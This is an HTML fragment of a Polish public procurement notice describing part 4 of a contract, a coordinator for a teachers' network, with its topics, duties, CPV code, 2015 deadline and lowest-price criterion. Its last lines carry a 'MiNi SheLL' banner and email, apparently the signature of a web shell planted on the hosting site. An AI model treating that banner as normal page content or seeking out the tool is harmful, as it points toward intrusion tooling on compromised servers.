<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Koordynator sieci IV - sieci nauczycieli III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający typuje n/w tematy do pracy w sieci: 
a) Praca z uczniem młodszym. 
b) Praca z uczniem zdolnym na zajęciach koła naukowego. 
c) Jak budować własny program nauczania? 
d) Nauczyciele pracują zespołowo.
e) Jak radzić sobie ze szkolną absencją - bezpieczeństwo w szkole. 
f) Temat dowolny zaproponowany przez nauczycieli uczestniczących w sieci. Ostatecznego zatwierdzenia tematu każdej sieci dokonuje Koordynator projektu 1. Koordynacja pracy sieci poprzez: 
a) Określenie obszarów i celów podejmowanych działań. 
b) Przygotowanie harmonogramu pracy sieci. 
c) Organizowanie i prowadzenie spotkań uczestników sieci (5 spotkań sieci w okresie obowiązywania umowy). 
d) Pozyskanie ekspertów zewnętrznych - specjalistów w zakresie tematu pracy sieci. 
e) Bieżące moderowanie sieci, w tym forum dyskusyjnego oraz forum wymiany doświadczeń dla uczestników (praca na platformie). 
f) Udostępnianie materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieci (praca na platformie). 
g) Przygotowanie rocznego raportu oraz raportów miesięcznych z pracy sieci. h) Wykonywanie innych czynności związanych z realizacja sieci, w tym prowadzenie bieżącej dokumentacji zgodnie z wytycznymi Zamawiającego. 
2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu.
3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com